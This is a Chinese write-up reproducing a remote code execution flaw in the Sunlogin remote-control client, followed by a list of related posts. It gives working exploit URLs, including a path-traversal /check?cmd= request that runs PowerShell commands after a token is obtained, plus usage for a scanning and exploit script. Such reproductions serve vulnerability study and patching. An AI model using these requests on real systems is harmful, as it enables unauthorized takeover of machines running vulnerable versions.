复现CVE-2022-10270(向日葵远程代码执行漏洞)

这篇具有很好参考价值的文章主要介绍了复现CVE-2022-10270(向日葵远程代码执行漏洞)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

引言

漏洞描述

影响版本:

原理:

环境搭建

手动复现

脚本复现

修复建议


引言

        本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!!

漏洞描述

        向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。CNVD披露了Oray旗下向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270 / CNVD-2022-03672),影响Windows系统中的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。目前已发现有漏洞利用演示视频公开,请相关用户尽快采取措施进行防护。

影响版本:

        向日葵个人版:windows <=11.0.0.33

        向日葵简约版:<= v1.0.1.43315

原理:

        当向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin 处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check 处,当cmd的值为ping/nslookup开头时触发

        向日葵在启动的时候会随机启动一个40000+高位端口,具体在 sub_140E0AAE8 可看到,随后载入IDA,对CID关键字进行搜索sub_140E20938、sub_140E1C954、sub_140E1A1F4,往上跟发现分别对应接口/cgi-bin/rpc 和 /cgi-bin/login.cgi ,其中在函数 sub_140E1C954 对应接口功能 /cgi-bin/rpc 中,传入如下参数即可在未授权的情况下获取到有效session,在知道被控端的验证码和识别码的情况下传入如下参数可获取到session。在知道主机的帐密的情况下通过 /cgi-bin/login.cgi 接口传入如下参数可获取到session 并返回设备的公网、内网地址等信息,该接口同时可用作暴力破解  

环境搭建

        在靶机安装存在漏洞的向日葵客户端,我使用的是SunloginClient_11.0.0.33162_X64.exe,我已将其放入网盘中,需要的自行提取:链接:https://pan.baidu.com/s/1LobRAEEdfYXc4Z7ej0nd3w?pwd=1234  提取码:1234

        安装好向日葵客户端后,靶场环境已准备就绪。

手动复现

        1.使用端口扫描的工具(如nmap,我这里使用的是其他的工具),对安装了存在向日葵漏洞的靶机40000-60000之间的端口进行扫描,找到存活的可疑端口:

复现CVE-2022-10270(向日葵远程代码执行漏洞)

        2.使用浏览器对可疑端口进行访问,若页面返回{"success":false,"msg":"Verification failure"}则说明该端口存在CVE-2022-10270漏洞。

复现CVE-2022-10270(向日葵远程代码执行漏洞)

        3.构造url获取验证码, http://(靶机ip):55928/cgi-bin/rpc?action=verify-haras,获取到的验证码即为cookie信息。复现CVE-2022-10270(向日葵远程代码执行漏洞)

 

        4.构造命令执行的url,http://(靶机ip):55928/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ whoami,再利用Burpsuite工具拦截请求加上cookie信息,CID=**********************HbRTVJwZL3然后发送,就能获取到命令执行的结果。复现CVE-2022-10270(向日葵远程代码执行漏洞)

脚本复现

        经过手动复现之后,我编写了一个脚本,能够自动的对存在向日葵漏洞的靶机进行扫描、以及漏洞利用,已上传到github,点我下载。

        使用方法:

        1.端口扫描:python sunflower_poc_exp.py --poc --ip (靶机ip) --port 40000-60000,获取到存在漏洞的端口。

        2.漏洞利用:python sunflower_poc_exp.py --exp --ip (靶机ip) --port  --command ipconfig,进行命令执行。复现CVE-2022-10270(向日葵远程代码执行漏洞)

 

修复建议

        更新向日葵版本。文章来源地址https://www.toymoban.com/news/detail-467957.html

到了这里,关于复现CVE-2022-10270(向日葵远程代码执行漏洞)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【新的小主机】向日葵远程控制ubuntu

    硬件:酷睿N100小主机,8G+512G。 系统:ubuntu22.04.3 目的:十月一放假,闲来无事,利用向日葵实现windows远程控制ubuntu,并搭建一些微服务。 原因 :向日葵使用的是 lightdm 来进行界面渲染,但是Ubuntu默认是没有的,而是通过 gdm3 进行图像处理。 使用命令 安装过程选择桌面系统

    2024年02月04日
    浏览(51)
  • 向日葵远程分辨率过低解决办法

    向日葵远程windows server 2019分辨率只有1024*768,没有1920*1080可选。 安装软件模拟显示器解决,分辨率最高可以选择4K; 软件安装完 系统-显示,会多出一个显示器,点击显示器2,设置仅在2上显示,在将分辨率设置为1920*1080,退出向日葵,再次远程,向日葵工具栏-分辨率会有更

    2023年04月09日
    浏览(62)
  • 向日葵远程控制中的键盘异常问题

    本文记录的是ubuntu 20.04 上, 向日葵的最高版本目前只有V 11.0.1.44968(2022.02) 我的被控制和 控制端都是上述环境; 起因,由于我昨天在控制端按下了 win/ 或者是其他的组合键 (具体哪个键盘确实没有注意到); 导致被控端上键盘布局出现问题了, 症状是 @ 和“ 这两个键位

    2024年02月04日
    浏览(254)
  • linux远程桌面管理工具(xrdp)、向日葵

    Windows远程桌面 linux远程桌面 使用向日葵远程桌面(手机端同理) 微软自带Remote Desktop Connection Manager (RDCMan)远程控制管理软件介绍 远程桌面连接管理器 v2.93 Windows远程桌面Ubuntu22.04(xrdp或向日葵)-Ubuntu系列02 linux远程桌面管理工具xrdp 需要如下几个条件: Windows电脑是专业

    2024年04月13日
    浏览(48)
  • 向日葵远程控制电脑时候键盘按键突然失灵【已解决】

    向日葵远程控制电脑时候键盘按键突然失灵,无法输入字母d和s。因为需要使用conda命令,不能输入d所以就比较麻烦。此外还不能使用Ctrl+V的复制命令。因此你不仅打不上d,还无法把别处的d复制上去。除非是你使用上键使用之前输入过的命令。不过这需要在锁定之前你输入过

    2024年02月11日
    浏览(299)
  • 向日葵远程控制第一人称3D鼠标无法操作旋转问题

    阅文时长 | 0.14分钟 字数统计 | 225.6字符 主要内容 | 1、引言背景 2、解决方案 3、声明与参考资料 『向日葵远程控制第一人称3D鼠标无法操作旋转问题』 编写人 | SCscHero 编写时间

    2024年02月07日
    浏览(50)
  • Ubuntu重启后向日葵远程连接一直卡在连接界面

    最近买了一个向日葵智能插座, 可以在手机上远程控制电脑开机和关机. 但是Ubuntu电脑开机成功后, 用向日葵远程一直卡在连接状态就是进不去. 最后搞了一段时间也试了好几种方法, 最后终于找到解决方法. 在此记录一下解决方法. 1.安装一下 lightdm LightDM是一个用于显示登录界

    2024年02月03日
    浏览(84)
  • 【ipad+向日葵远程控制】解决ipad上在向日葵中无法使用上下左右键、Tab键(解决方法是:在ipad上安装旧版本向日葵11.2.2,配合使用的是罗技K380键盘)

    如何下载老版本的ipad软件? - 我真的爱发明的回答 - 知乎 参考 | 解决iPad向日葵远程Windows电脑无法使用蓝牙键盘上下左右tab键的问题 解决ipad上在向日葵中无法使用上下左右键、Tab键 解决方法是:在ipad上下载旧版本 向日葵11.2.2 因此,下文的操作目的是:借助3个工具,实现在

    2024年02月10日
    浏览(70)
  • mac版本向日葵远程控制 忘记解锁密码如何解决

    卸载重新安装还是无法进入 一、删除配置文件 1、首先进入Mac端 cd /etc 目录并查看目录清单(命令如下) 2、执行删除命令(记住管理员运行删除) 3、然后重启软件就可以了

    2024年02月16日
    浏览(207)
  • Ubuntu无显示器连接,向日葵(ToDesk,Nomachine)远程控制

    当断开显示器连接后远程桌面会连续的抖动,判断是没有显示器的影响。 由于Ubuntu默认显示管理器是gdm,而向日葵使用的是lightdm,选择gdm3 当出现 无法修正错误,因为您要求某些软件包保持现状,就是它们破坏了软件包间的依赖关系。 使用 aptitude 安装 保存后重启 无显示器远

    2024年03月22日
    浏览(66)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包